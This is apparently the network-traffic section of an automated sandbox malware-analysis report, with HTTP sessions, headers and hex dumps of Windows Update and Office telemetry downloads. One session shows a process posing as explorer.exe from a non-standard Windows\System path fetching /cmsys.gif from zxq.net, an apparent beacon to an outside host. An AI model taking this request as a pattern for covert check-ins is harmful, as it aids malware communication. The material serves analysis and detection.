                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                    MS-CorrelationId: ec4a70cd-4361-40d3-8120-dbf856b8c6c0
                                                                                                                                                                                                                                                    MS-RequestId: a7cb442c-bdb0-471e-947a-e50fef674efe
                                                                                                                                                                                                                                                    MS-CV: zMCwcqfDfkG9RiWr.0
                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    113192.168.2.56048213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                    x-ms-request-id: ab89d8fd-301e-001f-7989-29aa3a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-17c5cb586f6f8m6jnehy0z65x400000005s0000000006862
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    114192.168.2.56048313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1360
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                    x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-16849878b78wv88bk51myq5vxc00000006r000000000cnfd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    115192.168.2.56048451.81.194.2024432920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC193OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Host: zxq.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC614INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                    link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                    x-redirect-by: WordPress
                                                                                                                                                                                                                                                    location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                                                                                                                                                                                    x-litespeed-cache: hit
                                                                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    116192.168.2.56048513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                    x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-16849878b78j7llf5vkyvvcehs00000007ng000000004e1c
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    117192.168.2.56048613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                    x-ms-request-id: cd644fad-f01e-0071-6ce7-27431c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-r197bdfb6b4wmcgqdschtyp7yg00000006a000000000c3xz
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    118192.168.2.56048713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                    x-ms-request-id: 27230864-a01e-0070-6533-26573b000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-17c5cb586f66g7mvgrudxte95400000001c0000000009x1p
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    119192.168.2.56048813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1360
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                    x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-16849878b78bcpfn2qf7sm6hsn000000086g000000001yf3
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    120192.168.2.56049013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1427
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                    x-ms-request-id: 08f6a26f-f01e-0071-6b1c-27431c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-16849878b78nx5sne3fztmu6xc00000007eg00000000a7es
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
